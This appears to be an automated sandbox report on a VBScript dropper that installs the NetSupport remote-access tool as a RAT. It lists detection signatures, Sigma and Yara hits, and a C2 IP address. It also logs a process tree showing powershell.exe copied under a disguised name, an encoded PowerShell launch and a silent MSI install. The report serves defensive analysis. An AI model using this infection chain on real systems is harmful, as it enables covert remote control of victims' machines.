Windows Analysis Report
Pyyidau.vbs

Overview

General Information

Sample name: Pyyidau.vbs
Analysis ID: 1561295
MD5: c1108260f7a287cb16f93c11a40fbf90
SHA1: 8eab07aef27baae17d1ce013cce58b2b43dcaa1d
SHA256: 484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c

Detection

NetSupport RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
.NET source code contains potential unpacker
Contains functionality to automate explorer (e.g. start an application)
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Enables network access during safeboot for specific services
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Powershell is started from unusual location (likely to bypass HIPS)
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries device information via Setup API
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution From GUID Like Folder Names
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected NetSupport remote tool

Classification

  • System is w10x64native
  • wscript.exe (PID: 6228 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • Pyyidau.vbs.exe (PID: 5876 cmdline: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc [encoded command omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • wscript.exe (PID: 2216 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" MD5: 4D780D8F77047EE1C65F747D9F63A1FE)
        • msiexec.exe (PID: 8392 cmdline: "C:\Windows\SysWOW64\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\vrep.msi" /quiet MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • RegAsm.exe (PID: 7040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 7860 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8212 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8220 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8236 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8244 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8260 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8268 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cmd.exe (PID: 6588 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • msiexec.exe (PID: 8432 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 8516 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F1F5193EAAA26C6686643ED3090C1E98 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • cmd.exe (PID: 8936 cmdline: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • attrib.exe (PID: 9000 cmdline: ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
    • MSIF373.tmp (PID: 9036 cmdline: "C:\Windows\Installer\MSIF373.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU MD5: 0FCF65C63E08E77732224B2D5D959F13)
    • msiexec.exe (PID: 9088 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6A6FD5B6F4DA3E504B51BAF4C9444B82 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIF985.tmp (PID: 9148 cmdline: "C:\Windows\Installer\MSIF985.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU MD5: 0FCF65C63E08E77732224B2D5D959F13)
    • checkdvd.exe (PID: 9208 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe" MD5: FE7D9DC26FF1615C13722E0F2DD3B815)
    • MSI1387.tmp (PID: 2428 cmdline: "C:\Windows\Installer\MSI1387.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I * MD5: 0FCF65C63E08E77732224B2D5D959F13)
      • winst64.exe (PID: 3360 cmdline: winst64.exe /q /q /ex /i MD5: 96E987D909600D34DD70C55F56EB8869)
    • MSI23E6.tmp (PID: 6204 cmdline: "C:\Windows\Installer\MSI23E6.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI MD5: 0FCF65C63E08E77732224B2D5D959F13)
    • pcicfgui_client.exe (PID: 7388 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini" MD5: B8ACD5C9E200166C6B4E5001AEEEAF20)
      • pcicfgui_client.exe (PID: 7108 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" MD5: B8ACD5C9E200166C6B4E5001AEEEAF20)
  • client32.exe (PID: 3456 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* * MD5: 297EA82401ACBEAD6BA4B19880DF2B8C)
    • client32.exe (PID: 8368 cmdline: "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI MD5: 297EA82401ACBEAD6BA4B19880DF2B8C)
      • cscript.exe (PID: 2232 cmdline: "cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 49749 MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)
        • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • svchost.exe (PID: 3652 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Config.Msi\e6def9.rbs | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
00000020.00000003.114561669687.0000000000A25000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000020.00000002.115179006644.0000000001266000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000001E.00000000.114225718112.00007FF679386000.00000002.00000001.01000000.00000010.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000020.00000003.115069209517.0000000000A56000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000020.00000002.115177447611.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
34.2.pcicfgui_client.exe.701b0000.6.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
35.2.pcicfgui_client.exe.df0000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
32.2.client32.exe.701b0000.9.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
33.0.client32.exe.1f0000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
32.2.client32.exe.1f0000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc [encoded command omitted], CommandLine: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc [encoded command omitted]
Source: Network Connection, Author: frack113, Florian Roth: Data: DestinationIp: 176.126.113.166, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2216, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49742
Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc [encoded command omitted], ParentImage: C:\Users\user\Desktop\Pyyidau.vbs.exe, ParentProcessId: 5876, ParentProcessName: Pyyidau.vbs.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , ProcessId: 2216, ProcessName: wscript.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc [encoded command omitted], ParentImage: C:\Users\user\Desktop\Pyyidau.vbs.exe, ParentProcessId: 5876, ParentProcessName: Pyyidau.vbs.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , ProcessId: 2216, ProcessName: wscript.exe
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5032, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", ProcessId: 6228, ProcessName: wscript.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: Client32Provider, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, ProcessId: 3360, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{71C5A887-11E0-4c5a-9B9B-D4A074555692}\(Default)
Source: File created, Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Pyyidau.vbs.exe, ProcessId: 5876, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oglvszav.vxt.ps1
Source: Network Connection, Author: frack113: Data: DestinationIp: 176.126.113.166, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2216, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49742
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8368, ProcessCommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y, ProcessId: 6588, ProcessName: cmd.exe
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic", CommandLine: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\msiexec.exe /V, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 8432, ParentProcessName: msiexec.exe, ProcessCommandLine: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic", ProcessId: 8936, ProcessName: cmd.exe
Source: Process started, Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5032, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", ProcessId: 6228, ProcessName: wscript.exe
Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 868, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv, ProcessId: 3652, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: http://pesterbdd.com/images/Pester.png4, Virustotal: Detection: 10%
Source: Pyyidau.vbs, ReversingLabs: Detection: 15%
Source: Pyyidau.vbs, Virustotal: Detection: 25%
Source: C:\Windows\Installer\MSI1387.tmp, File created: C:\Windows\setupact.log
Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe, File opened: C:\Program Files (x86)\NetSupport\NetSupport Manager\MSVCR100.dll
Source: unknown, HTTPS traffic detected: 176.126.113.166:443 -> 192.168.11.20:49742 version: TLS 1.2
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\tcctl32.pdbP source: client32.exe, 00000020.00000002.115186233551.000000006C977000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: sfxcab.pdb source: Pyyidau.vbs.exe, 00000004.00000002.113968442877.000000000A0DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.113930238948.0000000001002000.00000040.00000400.00020000.00000000.sdmp
                                Source: Binary string: D:\NSLBuilds\NSM\NSM14Trunk\licgen\Release_unicode\Licence.pdb source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\NSLBuilds\NSM\NSM14Trunk\licgen\x64\Release\CloseHookApp64.pdb source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\PCICTL.pdb source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Pyyidau.vbs.exe, 00000004.00000002.113967583372.0000000009590000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdb source: wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp, MSIF373.tmp, 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, MSIF373.tmp, 00000019.00000000.114135501778.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, MSIF985.tmp, 0000001B.00000002.114157054506.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSIF985.tmp, 0000001B.00000000.114151145405.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSI1387.tmp, 0000001D.00000000.114217635476.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI1387.tmp, 0000001D.00000002.114241895385.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI23E6.tmp, 0000001F.00000002.114270824312.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, MSI23E6.tmp, 0000001F.00000000.114259441382.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\x64\release_unicode\winst64.pdb source: winst64.exe, 0000001E.00000000.114225718112.00007FF679386000.00000002.00000001.01000000.00000010.sdmp, winst64.exe, 0000001E.00000002.114227744042.00007FF679386000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpJD source: wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114047457566.000000000B632000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\nsmsrc\nsm1201f\kbfiltr\sys\objfre_wnet_amd64\amd64\nskbfltr.pdb source: winst64.exe, 0000001E.00000003.114226774436.00000000010E6000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdbUGP source: client32.exe, 00000021.00000002.115183991198.0000000006BF0000.00000040.10000000.00040000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114282443624.0000000002DF0000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: D:\nsmsrc\ReProcessWindowshortcuts\Release\ReProcessWindowshortcuts.pdb source: wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Pyyidau.vbs.exe, 00000004.00000002.113967583372.0000000009590000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: wntdll.pdb source: client32.exe, 00000021.00000002.115183991198.0000000006BF0000.00000040.10000000.00040000.00000000.sdmp, pcicfgui_client.exe, 00000022.00000002.114282443624.0000000002DF0000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: protobuf-net.pdbSHA256}Lq source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000020.00000002.115176196956.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000020.00000000.114260013532.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000021.00000002.115175806998.00000000001F2000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000021.00000000.114272266016.00000000001F2000.00000002.00000001.01000000.00000015.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpcD source: MSIF373.tmp, 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp, MSIF373.tmp, 00000019.00000000.114135501778.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\pcihtmlgen\Release_unicode\PCIHTMLGen.pdb source: PCIhtmlgen.dll.20.dr
                                Source: Binary string: protobuf-net.pdb source: Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410f\ctl32\release_unicode\tcctl32.pdb source: client32.exe, 00000020.00000002.115186233551.000000006C977000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbp source: MSIF985.tmp, 0000001B.00000002.114157054506.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSIF985.tmp, 0000001B.00000000.114151145405.0000000000959000.00000002.00000001.01000000.0000000D.sdmp, MSI1387.tmp, 0000001D.00000000.114217635476.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI1387.tmp, 0000001D.00000002.114241895385.0000000001029000.00000002.00000001.01000000.0000000F.sdmp, MSI23E6.tmp, 0000001F.00000002.114270824312.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp, MSI23E6.tmp, 0000001F.00000000.114259441382.0000000000BD9000.00000002.00000001.01000000.00000014.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\htctl32.pdb source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\Release_unicode\PCICFGUI.pdb source: pcicfgui_client.exe, 00000022.00000002.114281184741.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, pcicfgui_client.exe, 00000022.00000000.114273328544.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp, pcicfgui_client.exe, 00000023.00000002.114274483585.0000000000DF2000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: msvcp100.i386.pdb source: client32.exe, 00000020.00000002.115191046027.000000006FDF1000.00000020.00000001.01000000.00000018.sdmp, client32.exe, 00000021.00000002.115191046071.000000006FDF1000.00000020.00000001.01000000.00000018.sdmp, pcicfgui_client.exe, 00000022.00000002.114306646393.000000006FDF1000.00000020.00000001.01000000.00000018.sdmp
